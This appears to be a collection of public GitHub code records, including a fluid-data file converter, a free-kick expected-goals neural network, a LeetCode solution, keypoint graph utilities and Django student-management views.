ax[1].plot(np.arange(epoch+1), metric_valid_hist)\n ax[1].set_title('PPL')\n ax[1].legend(['Train', 'Valid'])\n ax[1].set_xlim(0, num_epochs)\n plt.savefig('learning-curve.png')\n\n\nif __name__ == '__main__':\n main()\n\n\n","repo_name":"seyedsajadashrafi/language-modeling","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2466616147","text":"import csv\nimport os\nimport re\nimport sys\nimport math\nimport json\nimport numpy as np\n\ndata_file_name = 'horstmann_data'\nfluids_file_name = 'srkfluids'\n\ndef fld_to_csv(file_name):\n\n csv_path = os.path.join(sys.path[0], file_name + '.csv')\n fld_path = os.path.join(sys.path[0], file_name + '.fld')\n\n\n with open(csv_path, 'w') as g:\n with open(fld_path) as f:\n line_nr = 1\n for line in f.readlines():\n line = re.sub('\\t+', '\\t', line)\n if line_nr == 1:\n line = line.replace('\\tgroups', '\\tg' + '\\tg'.join(list(map(str, range(1, 31)))))\n else:\n line = line.replace(' ', '')\n line = line.strip()\n line_nr += 1\n g.write(line + '\\n')\n\n\n\ndef read_csv(file_name):\n result = []\n\n path = os.path.join(sys.path[0], file_name + '.csv')\n\n with open(path, newline='') as f:\n reader = csv.reader(f, delimiter='\\t')\n for row in reader:\n result.append(row)\n return result\n\ndef get_row(data, key, value):\n for x in data:\n if len(x) > 1 and x[key] == value:\n return x\n return None\n\n\ndef write_fld(file_name, data):\n path = os.path.join(sys.path[0], file_name + \".fld\")\n with open(path, \"w\") as f:\n for i in range(len(data)):\n line = data[i]\n \n \n \n line_str = \"\"\n\n for ele in line:\n\n tab_number = 17\n\n ele = str(ele)\n delta = 0\n \n # delta = get_tab_length(ele)\n delta = math.ceil(len(ele)/4)\n rest = len(ele)%4\n\n if rest != 0:\n \n tab_number -= delta\n\n else:\n tab_number -= (delta + 1)\n\n line_str += (ele + tab_number * \"\\t\")\n f.write(line_str + \"\\n\")\n \n\ndef write_mappings(data, file_name):\n\n path = os.path.join(sys.path[0], file_name + \".json\")\n\n if os.path.exists(path) == False:\n with open(path, \"w\") as f:\n json.dump(data, f , ensure_ascii=False, indent=2, sort_keys=True)\n else:\n print(\"File {} already there\".format(file_name + \".json\"))\n\n\ndef merge(data, fluids, mappings):\n # delete @END\n fluids.pop()\n for d in data:\n #look for same CAS Nr\n f = get_row(fluids, 2, d[2])\n if f:\n continue\n #skip header\n if d[0] == \"english name\":\n continue\n \n y = []\n gr_skip = []\n\n for i in range(len(fluids[0])):\n\n item = fluids[0][i]\n\n fluid = d[0]\n\n\n if item in mappings.keys():\n element_idx = data[0].index(mappings[item])\n\n if item == 'Pkrit / MPa':\n element = round(float(d[element_idx].split('*')[0])/1000,4)\n element = str(element)\n else:\n element = d[element_idx].split('*')[0].lower()\n y.append(element)\n else:\n \n if item in gr_skip:\n continue\n\n if item == 'g1':\n groups = []\n\n\n group_code = d[-1]\n \n if group_code != 'n.a.':\n \n\n group_list = group_code.split(\";\")\n group_list = [i.strip() for i in group_list]\n\n for ele in group_list:\n amount = int(ele.split('×')[0])\n group = ele.split('×')[1]\n # amount = int(ele.split('×')[0])\n # group = ele.split('×')[1]\n \n\n\n groups += amount*[group]\n y[-1] = str(len(groups))\n i += len(groups)\n for k in range(len(groups)):\n gr_skip.append(\"g\"+str(k+1))\n y.append(groups[k])\n continue\n \n if item == \"M / (g/mol)\":\n # calculate molar mass\n\n mass = 
0\n\n C_mass = 12.01\n O_mass = 16\n H_mass = 1\n Br_mass = 79.9\n Si_mass = 28.08\n N_mass = 14\n F_mass = 18.99\n Cl_mass = 35.4\n S_mass = 32.06\n I_mass = 126.9\n\n formula = d[1]\n \n mass = round(molar_mass(formula),2)\n \n y.append(str(mass))\n continue\n\n y.append('0')\n fluids.append(y)\n fluids.append(['@END'])\n return fluids\n\ndef read_systems(filename):\n\n path = os.path.join(sys.path[0], filename + \".json\")\n with open(path) as f:\n data = json.loads(f.read())\n\n return data\n\ndef check_systems(systems, data):\n\n res = {}\n\n found = 0\n number = len(systems)\n\n for ele in systems.keys():\n\n res[ele] = None\n ele_cas = systems[ele]['CAS']\n\n for i in range(len(data)-1):\n data_cas = data[i][2]\n if ele_cas == data_cas:\n found += 1\n data_ele = data[i][0]\n res[ele] = data_ele\n break\n\n \n\n return (res, number, found)\n\n\ndef molar_mass(formula):\n weights = {\n 'C': 12.01,\n 'O': 16,\n 'H': 1,\n 'Br': 79.9,\n 'Si': 28.08,\n 'N': 14,\n 'F': 18.99,\n 'Cl': 35.4,\n 'S': 32.06,\n 'I': 126.9\n }\n result = 0\n for item in re.findall('[A-Z][a-z]*[0-9]*', formula):\n m = re.match('([A-Z][a-z]*)(\\d+)*', item)\n if m:\n if m.groups()[1] != None:\n test = m.groups()\n result += weights[m.group(1)] * int(m.group(2))\n else:\n result += weights[m.group(1)]\n\n return result\n\nfld_to_csv(fluids_file_name)\ndata = read_csv(data_file_name)\nfluids = read_csv(fluids_file_name)\n\ntest = list(list(zip(*fluids))[0])\n\nlength = []\n\nfor i in range(1,len(test)):\n length.append(len(test[i]))\n\nprint(str(max(length)))\n\n\n\nmappings = {\n# 996 ['english name', 'formula', 'CAS-nr.', 'Tc,i / K', 'Pc,i / kPa', 'vc,i / cm3 mol-1', 'ωi', 'c1,i', 'c2,i', 'c3,i', 'Tmin / K', 'Tmax / K', 'increments [counter × sub group number]']\n# 136 ['BEZEICHNUNG', 'ALTERNATIVER NAME', 'CAS-NR', 'M / (g/mol)', 'Azentr. Fak.', 'Pkrit / MPa', 'Tcrit / K', 'Ptr / Mpa', 'Ttr / K', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'c1', 'c2', 'c3', 'nr_of_groups', 'g1', 'g2', 'g3', 'g4', 'g5', 'g6', 'g7', 'g8', 'g9', 'g10', 'g11', 'g12', 'g13', 'g14', 'g15', 'g16', 'g17', 'g18', 'g19', 'g20', 'g21', 'g22', 'g23', 'g24', 'g25', 'g26', 'g27', 'g28', 'g29'] ''\n 'BEZEICHNUNG': 'english name',\n 'ALTERNATIVER NAME': 'english name',\n 'CAS-NR': 'CAS-nr.',\n 'Tcrit / K': 'Tc,i / K',\n 'Pkrit / MPa': 'Pc,i / kPa',\n 'Azentr. 
Fak.': 'ωi',\n 'c1': 'c1,i', \n 'c2': 'c2,i', \n 'c3': 'c3,i'\n}\n\n\nmerged = merge(data, fluids, mappings)\n# print(len(fluids), fluids[0])\nwrite_fld("test", merged)\nsystems = read_systems("database_components")\n\n\n\n\nres, n_sys, n_found = check_systems(systems, merged)\n\nwrite_mappings(res, "mappings")\n\nfound_per = round(n_found/n_sys * 100, 0)\n\nprint(str(found_per) + " % found")","repo_name":"fischer-sw/thesis-daniel-benchmark-thermo","sub_path":"Daten/srk_fldfile/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":7594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19234236367","text":"import timeit\n\nmenu = [\n [\"egg\", \"spam\", \"bacon\"],\n [\"egg\", \"sausage\", \"bacon\"],\n [\"egg\", \"spam\"],\n [\"egg\", \"bacon\", \"spam\"],\n [\"egg\", \"bacon\", \"sausage\", \"spam\"],\n [\"spam\", \"bacon\", \"sausage\", \"spam\"],\n [\"spam\", \"egg\", \"spam\", \"spam\", \"bacon\", \"spam\"],\n [\"spam\", \"egg\", \"sausage\", \"spam\"],\n [\"chicken\", \"chips\"]\n]\n\n\nfor meal in menu:\n if \"spam\" not in meal:\n print(meal)\n\nprint(\"-\" * 40)\n\n\ndef spamless_comp():\n # meals = [meal for meal in menu if \"spam\" not in meal] # using inline\n meals = [meal for meal in menu if not_spam(meal)] # using function\n return meals\n\n\nprint(\"-\" * 40)\n\n\ndef not_spam(meal_list: list):\n \"\"\"\n Filter\n :param meal_list:\n :return:\n \"\"\"\n return \"spam\" not in meal_list\n\n\ndef spamless_filter():\n spam_less_meals = list(filter(not_spam, menu))\n return spam_less_meals\n\n\nif __name__ == '__main__':\n print(spamless_comp())\n print(spamless_filter())\n print(timeit.timeit(spamless_comp, number=100000))\n print(timeit.timeit(spamless_filter, number=100000))\n","repo_name":"kumarvgit/python3","sub_path":"map/filtertest.py","file_name":"filtertest.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23775480831","text":"'''\n823. Binary Trees With Factors\nMedium\n\nGiven an array of unique integers, arr, where each integer arr[i] is strictly greater than 1.\n\nWe make a binary tree using these integers, and each number may be used any number of times. Each non-leaf node's value should be equal to the product of the values of its children.\n\nReturn the number of binary trees we can make. The answer may be too large so return the answer modulo 10^9 + 7.\n\nExample 1:\n\nInput: arr = [2,4]\nOutput: 3\nExplanation: We can make these trees: [2], [4], [4, 2, 2]\nExample 2:\n\nInput: arr = [2,4,5,10]\nOutput: 7\nExplanation: We can make these trees: [2], [4], [5], [10], [4, 2, 2], [10, 2, 5], [10, 5, 2].\n\nConstraints:\n\n1 <= arr.length <= 1000\n2 <= arr[i] <= 10^9\nAll the values of arr are unique.\n'''\nclass Solution:\n def numFactoredBinaryTrees(self, arr: List[int]) -> int:\n arr.sort()\n mod = 10**9+7\n n = len(arr)\n index = {x: i for i, x in enumerate(arr)}\n dp = [1]*n\n for i, x in enumerate(arr):\n for j in range(i):\n if x % arr[j] == 0: #arr[j] will be left child\n right = x//arr[j]\n if right in index:\n dp[i] += dp[j]*dp[index[right]]\n dp[i] %= mod\n return sum(dp)%mod","repo_name":"jomesh18/Leetcode","sub_path":"Leetcode_challenge/2022/08. 
Aug/09.numFactoredBinaryTrees.py","file_name":"09.numFactoredBinaryTrees.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13381501145","text":"import numpy as np\nimport pandas as pd\nfrom kp_utils import extract_vid_keypoints\nfrom data_utils import get_json_as_df\nimport os\n\ngcn_input_dir = './data/gcn_input/' # define gcn input directory\nos.makedirs(gcn_input_dir, exist_ok=True)\n\n# generate adjacency and feature matrices for all videos across some subset of glosses,\n# across splits, then save each as numpy arrays in dedicated directory\ndef save_vids_gcn_input(gloss_inst_df, glosses_to_test, holistic=True):\n mp_dir = 'holistic' if holistic else 'pose'\n gloss_groups = gloss_inst_df.groupby('gloss') #group rows in json df with all instances by gloss\n\n for gloss, gloss_df in gloss_groups:\n\n if gloss in glosses_to_test:\n split_groups = gloss_df.groupby('split') #group rows in the df for this gloss by type of split; not all glosses have every type\n\n for split, split_df in split_groups:\n split_df = split_df.reset_index(drop=True)\n adj_file_path = f\"{gcn_input_dir}{mp_dir}/{split}/adj_mats/\" #specify path to our adjacency matrices (NxN)\n node_ft_file_path = f\"{gcn_input_dir}{mp_dir}/{split}/node_ft_mats/\" #specify path to our node feature matrices (NxD)\n\n os.makedirs(adj_file_path, exist_ok=True)\n os.makedirs(node_ft_file_path, exist_ok=True)\n\n print(f\"Saving gcn_input for gloss {gloss}, split {split}\")\n for i in range(split_df.shape[0]):\n vid_id = split_df.loc[i, 'video_id']\n \n ft_path = f\"{node_ft_file_path}{vid_id}_{gloss}.npy\"\n adj_path = f\"{adj_file_path}{vid_id}_{gloss}.npy\"\n\n # save keypoint features, adjacency matrix for this video \n if not(os.path.exists(ft_path)):\n # generate keypoint features from keypoints\n kp_ft = create_keypoint_features(vid_id)\n np.save(ft_path, np.array(kp_ft))\n \n # if not(os.path.exists(adj_path)): #don't bother generating again\n # # generate adjacency matrix from keypoint features\n # kp_adj = create_adjacency_matrix(kp_ft)\n # np.save(adj_path, np.array(kp_adj))\n\n# extract the keypoint features, and reshape the mean keypoint values across frames to obtain matrix of size N, D\n# where N is the number of nodes and D is the number of input features (x, y, z, visibility)\ndef create_keypoint_features(video_id):\n # Extract keypoints for the video_id using the extract_vid_keypoints function\n keypoints_list, _ = extract_vid_keypoints(video_id, gcn_input=True)\n\n # Convert keypoints list into a NumPy array\n keypoints_array = np.array(keypoints_list)\n\n # Calculate the mean keypoints across all frames of the video\n mean_keypoints = np.mean(keypoints_array, axis=0)\n\n return mean_keypoints.reshape(-1, 4)\n\n# create adjacency matrix of size N,N where N is the number of nodes in the graph\ndef create_adjacency_matrix(keypoint_features):\n num_keypoints = keypoint_features.shape[0]\n adjacency_matrix = np.zeros((num_keypoints, num_keypoints))\n\n for i in range(num_keypoints):\n for j in range(num_keypoints):\n distance = np.linalg.norm(keypoint_features[i, :2] - keypoint_features[j, :2])\n adjacency_matrix[i, j] = 1 / (1 + distance)\n\n return adjacency_matrix\n","repo_name":"yasminfarhan/Sign-Language-Decoding","sub_path":"dgcn_utils.py","file_name":"dgcn_utils.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
+{"seq_id":"26334068945","text":"from django.shortcuts import render\nimport json\n\nfrom .models import Roommate\n\n\ndef index(request):\n # Load overview\n overview_file = open('overview.json', 'r')\n users = json.load(overview_file)['results']\n\n # Define all roommates\n roommate1 = Roommate(users[0])\n roommate2 = Roommate(users[1])\n roommate3 = Roommate(users[2])\n roommates = (roommate1, roommate2, roommate3)\n\n # Find all time best and best max\n top_score = max([roommate.total_pullups for roommate in roommates])\n top_max = max([roommate.max_pullups for roommate in roommates])\n for roommate in roommates:\n if roommate.total_pullups == top_score:\n top_alltime = roommate\n if roommate.max_pullups == top_max:\n top_max_roommate = roommate\n\n # Find amount of daily wins\n number_of_days = json.load(open('sams_days.json', 'r'))['count']\n sams_days = json.load(open('sams_days.json', 'r'))['results']\n zachs_days = json.load(open('zachs_days.json', 'r'))['results']\n jarrods_days = json.load(open('jarrods_days.json', 'r'))['results']\n roommate_days = (sams_days, zachs_days, jarrods_days)\n\n sam_wins = 0\n zach_wins = 0\n jarrod_wins = 0\n i = 0\n while i < number_of_days:\n best_score = 0\n for days in roommate_days:\n if days[i]['total'] > best_score:\n best_score = days[i]['total']\n best_user = days[i]['user_name']\n if best_user == 'Sam':\n sam_wins += 1\n if best_user == 'Blade':\n zach_wins += 1\n if best_user == 'J-bod':\n jarrod_wins += 1\n i += 1\n\n wins = (sam_wins, zach_wins, jarrod_wins)\n max_wins = max(wins)\n if max_wins == sam_wins:\n daily_wins_winner = 'Sam'\n elif max_wins == zach_wins:\n daily_wins_winner = 'Blade'\n elif max_wins == jarrod_wins:\n daily_wins_winner = 'J-bod'\n\n context = {\n 'roommates': roommates,\n 'alltimechamp': top_alltime,\n 'topmax': top_max_roommate,\n 'daily_wins_winner': daily_wins_winner,\n 'daily_wins_top': max_wins,\n }\n\n return render(request, 'index.html', context)\n\n\ndef explanation(request):\n context = {}\n return render(request, 'explanation.html', context)\n","repo_name":"samdowd/pullup-tracker","sub_path":"pullupstats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6626184668","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Apr 15 10:41:19 2023\r\n\r\n@author: hamad\r\n\"\"\"\r\nimport pandas as pd\r\nimport numpy as np\r\nimport pitch\r\nimport matplotlib.pyplot as plt\r\n#import machine learning libraries \r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import StandardScaler\r\nfrom tensorflow.keras import Sequential\r\nfrom tensorflow.keras.layers import Dense\r\nfrom tensorflow.keras.optimizers import Adam\r\nfrom tensorflow.keras.callbacks import EarlyStopping\r\n\r\ndf = pd.read_csv('../data/freeKicks.csv')\r\n\r\ncolumns = ['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length']\r\n\r\n\r\nfreeKickShot=df[df['free_kick_type']=='free_kick_shot']\r\n\r\n\r\n\r\n\r\nfreeKickCross=df[df['free_kick_type']=='free_kick_cross']\r\n#construct the feature matrix and the target variable\r\nX = freeKickShot[columns]\r\ny = freeKickShot['goal']\r\n\r\n\r\n\r\n#spllit the data to train, validation and test\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, train_size = 0.6, random_state = 123, stratify = y)\r\nX_cal, X_val, y_cal, y_val = 
train_test_split(X_test, y_test, train_size = 0.5, random_state = 123, stratify = y_test)\r\n\r\n#scale data\r\nscaler = StandardScaler()\r\nX_train = scaler.fit_transform(X_train)\r\nX_val = scaler.transform(X_val)\r\nX_cal = scaler.transform(X_cal)\r\n\r\n#creating a function with a model architecture\r\ndef create_model():\r\n model = Sequential([\r\n Dense(10, activation='relu'),\r\n Dense(10, activation='relu'),\r\n Dense(10, activation='relu'),\r\n Dense(1, activation = 'sigmoid'),\r\n ])\r\n opt = Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999)\r\n model.compile(optimizer=opt, loss=\"mean_squared_error\" , metrics=['accuracy'])\r\n return model\r\n\r\n#create model\r\nmodel = create_model()\r\n\r\n#create an early stopping object\r\ncallback = EarlyStopping(min_delta=1e-5, patience = 50, mode = \"min\", monitor = \"val_loss\", restore_best_weights=True)\r\n\r\n#fit the model \r\nhistory = model.fit(X_train, y_train, validation_data=(X_val, y_val), epochs=1000, verbose=1, batch_size=16, callbacks = [callback]) \r\n\r\nfig, axs = plt.subplots(2, figsize=(10,12))\r\n#plot training history - accuracy\r\naxs[0].plot(history.history['accuracy'], label='train') \r\naxs[0].plot(history.history['val_accuracy'], label='validation')\r\naxs[0].set_title(\"Accuracy at each epoch\")\r\naxs[0].set_xlabel(\"Epoch\")\r\naxs[0].set_ylabel(\"Accuracy\")\r\naxs[0].legend()\r\n\r\n#plot training history - loss function\r\naxs[1].plot(history.history['loss'], label='train') \r\naxs[1].plot(history.history['val_loss'], label='validation')\r\naxs[1].legend()\r\naxs[1].set_title(\"Loss at each epoch\")\r\naxs[1].set_xlabel(\"Epoch\")\r\naxs[1].set_ylabel(\"MSE\")\r\nplt.show()\r\n\r\n##############################################################################\r\n# Assessing our model\r\n# ----------------------------\r\n# To assess our model, we calculate ROC AUC and investigate calibration curves. From the plots we can see that some of the higher probabilities are\r\n# underestimated by our model, but these are satisfactory results given the amount of data we have and a shallow network. Also, we calculate Brier score\r\n# on unseen data. It amounts to 0.08, which is a good score. 
\r\n\r\n#ROC CURVE\r\nfrom sklearn.metrics import roc_curve, roc_auc_score, brier_score_loss\r\nfig, axs = plt.subplots(2, figsize=(10,12))\r\ny_pred = model.predict(X_cal)\r\nfpr, tpr, _ = roc_curve(y_cal, y_pred)\r\nauc = roc_auc_score(y_cal, y_pred)\r\naxs[0].plot(fpr,tpr,label= \"AUC = \" + str(auc)[:4])\r\naxs[0].plot([0, 1], [0, 1], color='black', ls = '--')\r\naxs[0].legend()\r\naxs[0].set_ylabel('True Positive Rate')\r\naxs[0].set_xlabel('False Positive Rate')\r\naxs[0].set_title('ROC curve')\r\n\r\n#CALIBRATION CURVE\r\nfrom sklearn.calibration import calibration_curve\r\nprob_true, prob_pred = calibration_curve(y_cal, y_pred, n_bins=10)\r\naxs[1].plot(prob_pred, prob_true)\r\naxs[1].plot([0, 1], [0, 1], color='black', ls = '--')\r\naxs[1].set_ylabel('Empirical Probability')\r\naxs[1].set_xlabel('Predicted Probability')\r\naxs[1].set_title(\"Calibration curve\")\r\nplt.show()\r\n#Brier score\r\nprint(\"Brier score\", brier_score_loss(y_cal, y_pred))\r\n\r\n\r\n#store data in a matrix\r\nX_unseen = freeKickShot[columns]\r\n\r\n#scale data\r\nX_uns = scaler.transform(X_unseen)\r\n\r\n#make predictions\r\nxgs_shot= model.predict(X_uns)\r\n\r\n#find xG\r\nfreeKickShot[\"our_xG\"] = xgs_shot\r\n\r\n\r\n\r\n#Create a 2D map of xG\r\npgoal_2d_shot=np.zeros((68,68))\r\nfor x in range(68):\r\n for y in range(68):\r\n \r\n# We divide the penalty area into three sections: to the left of, above, and to the right of the penalty area.\r\n# In each section, we create a data frame for every point and then apply our model\r\n# to predict the probability of scoring\r\n\r\n # Compute probability of goal above the penalty area\r\n if (y>14) & (y<=53)& (x>=16.5):\r\n # in this section we create a data frame \r\n xG=pd.DataFrame(columns=['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length'])\r\n #angle\r\n angle = np.arctan(7.32 *x /(x**2 + abs(y-68/2)**2 - (7.32/2)**2))\r\n if angle<0:\r\n angle= np.pi + angle\r\n #distance\r\n distance=np.sqrt(x**2+y**2)\r\n \r\n #distance squared\r\n distance_squared=np.power(distance,2)\r\n \r\n #distance cube\r\n distance_cube=np.power(distance,3)\r\n \r\n #adjusted distance\r\n adj_distance=abs(distance-16.5)\r\n \r\n #adjusted distance squared\r\n adj_distance_squared=np.power(adj_distance,2)\r\n \r\n # adjusted distance cube\r\n adj_distance_cube=np.power(adj_distance,3)\r\n \r\n #arc length\r\n arc_length=distance*angle\r\n #\r\n xG['distance']=[distance]\r\n #arc length\r\n xG['arc_length']=[arc_length]\r\n\r\n #distance squared\r\n xG['distance_squared']=[distance_squared]\r\n\r\n #distance cube\r\n xG['distance_cube']=[np.power(distance,3)]\r\n # adjusted distance\r\n xG['adj_distance']=[adj_distance]\r\n\r\n #adjusted distance squared\r\n xG['adj_distance_squared']=[adj_distance_squared]\r\n\r\n #adjusted distance cube\r\n xG['adj_distance_cube']=[adj_distance_cube]\r\n\r\n #angle\r\n xG['angle']=[angle]\r\n #scale data\r\n X_uns = scaler.transform(xG)\r\n #make predictions\r\n xg= model.predict(X_uns)*100\r\n pgoal_2d_shot[x,y]=xg\r\n # Compute probability of goal to the right of penalty area \r\n if (y>53):\r\n xG=pd.DataFrame(columns=['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length'])\r\n #angle\r\n angle = np.arctan(7.32 *x /(x**2 + abs(y-68/2)**2 - (7.32/2)**2))\r\n if angle<0:\r\n angle= np.pi + angle\r\n #distance\r\n distance=np.sqrt(x**2+y**2)\r\n #distance squared\r\n 
distance_squared=np.power(distance,2)\r\n #distance cube\r\n distance_cube=np.power(distance,3)\r\n #adjusted distance\r\n adj_distance=abs(distance-16.5)\r\n #adjusted distance squared\r\n adj_distance_squared=np.power(adj_distance,2)\r\n # adjusted distance cube\r\n adj_distance_cube=np.power(adj_distance,3)\r\n #arc length\r\n arc_length=distance*angle\r\n #\r\n xG['distance']=[distance]\r\n #arc length\r\n xG['arc_length']=[arc_length]\r\n\r\n #distance squared\r\n xG['distance_squared']=[distance_squared]\r\n\r\n #distance cube\r\n xG['distance_cube']=[np.power(distance,3)]\r\n # adjusted distance\r\n xG['adj_distance']=[adj_distance]\r\n\r\n #adjusted distance squared\r\n xG['adj_distance_squared']=[adj_distance_squared]\r\n\r\n #adjusted distance cube\r\n xG['adj_distance_cube']=[adj_distance_cube]\r\n\r\n #angle\r\n xG['angle']=[angle]\r\n #scale data\r\n X_uns = scaler.transform(xG)\r\n #make predictions\r\n xg= model.predict(X_uns)*100\r\n pgoal_2d_shot[x,y]=xg\r\n \r\n # Compute probability of goal to the left of penalty area \r\n if (y<=14):\r\n xG=pd.DataFrame(columns=['distance', 'distance_squared', 'distance_cube', 'adj_distance',\r\n 'adj_distance_squared', 'adj_distance_cube','angle', 'arc_length'])\r\n #angle\r\n angle = np.arctan(7.32 *x /(x**2 + abs(y-68/2)**2 - (7.32/2)**2))\r\n if angle<0:\r\n angle= np.pi + angle\r\n #distance\r\n distance=np.sqrt(x**2+y**2)\r\n #distance squared\r\n distance_squared=np.power(distance,2)\r\n #distance cube\r\n distance_cube=np.power(distance,3)\r\n #adjusted distance\r\n adj_distance=abs(distance-16.5)\r\n #adjusted distance squared\r\n adj_distance_squared=np.power(adj_distance,2)\r\n # adjusted distance cube\r\n adj_distance_cube=np.power(adj_distance,3)\r\n #arc length\r\n arc_length=distance*angle\r\n #\r\n xG['distance']=[distance]\r\n #arc length\r\n xG['arc_length']=[arc_length]\r\n\r\n #distance squared\r\n xG['distance_squared']=[distance_squared]\r\n\r\n #distance cube\r\n xG['distance_cube']=[np.power(distance,3)]\r\n # adjusted distance\r\n xG['adj_distance']=[adj_distance]\r\n\r\n #adjusted distance squared\r\n xG['adj_distance_squared']=[adj_distance_squared]\r\n\r\n #adjusted distance cube\r\n xG['adj_distance_cube']=[adj_distance_cube]\r\n\r\n #angle\r\n xG['angle']=[angle]\r\n #scale data\r\n X_uns = scaler.transform(xG)\r\n #make predictions\r\n xg= model.predict(X_uns)*100\r\n pgoal_2d_shot[x,y]=xg\r\n\r\n\r\n\r\n\r\n#plot pitch\r\n(fig,ax) = pitch.createGoalMouth()\r\n\r\n#plot probability\r\npos = ax.imshow(pgoal_2d_shot, extent=[-1,68,68,-1], aspect='auto',cmap=plt.cm.Reds,vmin=0, vmax=10, zorder = 1)\r\nfig.colorbar(pos, ax=ax)\r\n\r\n\r\n","repo_name":"hamadkiema1991/Shots-in-football","sub_path":"freekick_analysis/neuronal_network_model.py","file_name":"neuronal_network_model.py","file_ext":"py","file_size_in_byte":10351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20116696162","text":"from django.shortcuts import render, reverse, get_object_or_404, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.decorators import login_required\nfrom Student_Management.decorators import role_required\nfrom user_management.forms import *\nfrom rest_framework import viewsets\nfrom .serializers import *\n\nclass StudentViewSet(viewsets.ModelViewSet):\n queryset = Profile.objects.all()\n serializer_class = ProfileSerializer\n\ndef home(request):\n if 
request.user.username:\n if request.user.profile.profilerole.name == 'Student':\n return redirect('/details/' + str(request.user.id) + '/')\n return HttpResponseRedirect(reverse('user_list'))\n else:\n return HttpResponseRedirect(reverse('user_login'))\n #return HttpResponse('hello')\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff','Instructor'])\ndef user_list(request):\n #print(request.user.profile.profilerole)\n context = {}\n users = Profile.objects.all()\n grouprole = Group.objects.all()[3]\n context['usertype'] = 'Students'\n context['users'] = Profile.objects.filter(profilerole = grouprole)\n #return HttpResponse('hello')\n return render(request, 'user_management/index.html', context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin'])\ndef staff_list(request):\n #print(request.user.profile.profilerole)\n context = {}\n users = Profile.objects.all()\n grouprole = Group.objects.all()[1]\n context['usertype'] = 'Staff'\n context['users'] = Profile.objects.filter(profilerole = grouprole)\n #return HttpResponse('hello')\n return render(request, 'user_management/index.html', context)\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff'])\ndef instructor_list(request):\n #print(request.user.profile.profilerole)\n context = {}\n users = Profile.objects.all()\n grouprole = Group.objects.all()[2]\n context['usertype'] = 'Instructor'\n context['users'] = Profile.objects.filter(profilerole = grouprole)\n #return HttpResponse('hello')\n return render(request, 'user_management/index.html', context)\n\ndef user_add(request):\n context = {}\n if request.method == 'POST':\n user_form = UserForm(request.POST)\n context['user_form'] = user_form\n if user_form.is_valid():\n u = user_form.save()\n userprofile = get_object_or_404(Profile, user_id=u.id)\n profile_form = ProfileForm(instance=userprofile)\n return render(request, 'user_management/editp.html', {\"user_form\": profile_form, \"id\":u.id})\n else:\n return render(request, 'user_management/add.html', context)\n else:\n user_form = UserForm()\n context['user_form'] = user_form\n return render(request, 'user_management/add.html', context)\n\ndef profile_edit(request, id):\n user = get_object_or_404(Profile, user_id=id)\n if request.method == 'POST':\n profile_form = ProfileForm(request.POST, request.FILES, instance=user)\n if profile_form.is_valid():\n profile_form.save()\n if request.user.profile.profilerole.name == 'Student':\n return redirect('/details/'+str(user.id)+'/')\n return HttpResponseRedirect(reverse('user_list'))\n else:\n return render(request, 'user_management/editp.html', {\"user_form\": profile_form, 'id':id})\n else:\n profile_form = ProfileForm(instance=user)\n return render(request, 'user_management/editp.html', {\"user_form\": profile_form, 'id':id})\n\n@login_required(login_url='/login/')\ndef profile_details(request, id=None):\n context = {}\n context['userprofile'] = get_object_or_404(User, id=id)\n print(get_object_or_404(User, id=id))\n #return HttpResponse('hello')\n return render(request, 'user_management/details.html', context)\n\ndef user_delete(request, id=None):\n user = get_object_or_404(User, id=id)\n if request.method == 'POST':\n if request.user.profile.profilerole.name == 'Student':\n user.delete()\n return redirect('/login/')\n print(type(user))\n user.delete()\n return HttpResponseRedirect(reverse('user_list'))\n else:\n context = {}\n context['userprofile'] = user\n return render(request, 
'user_management/delete.html', context)\n\ndef user_login(request):\n context = {}\n if request.method == 'POST':\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user:\n login(request, user)\n\n if request.GET.get('next', None):\n return HttpResponseRedirect(request.GET['next'])\n if user.profile.profilerole.name == 'Student':\n return redirect('/details/'+str(user.id)+'/')\n return HttpResponseRedirect(reverse('user_list'))\n else:\n context['error'] = 'Invalid Credentials'\n return render(request, 'user_management/login.html', context=context)\n else:\n return render(request, 'user_management/login.html', context=context)\n\ndef user_logout(request):\n logout(request)\n return HttpResponseRedirect(reverse('user_login'))\n\n@login_required(login_url='/login/')\n@role_required(allowed_roles=['Admin','Staff','Instructor'])\ndef student_attendance(request):\n context = {}\n if request.method == 'POST':\n attendanceForm = AttendanceForm(request.POST)\n context['attendanceForm'] = attendanceForm\n if attendanceForm.is_valid():\n attendanceForm.save()\n return HttpResponseRedirect(reverse('user_list'))\n else:\n attendanceForm = AttendanceForm()\n context['attendanceForm'] = attendanceForm\n return render(request, 'user_management/attendance.html', 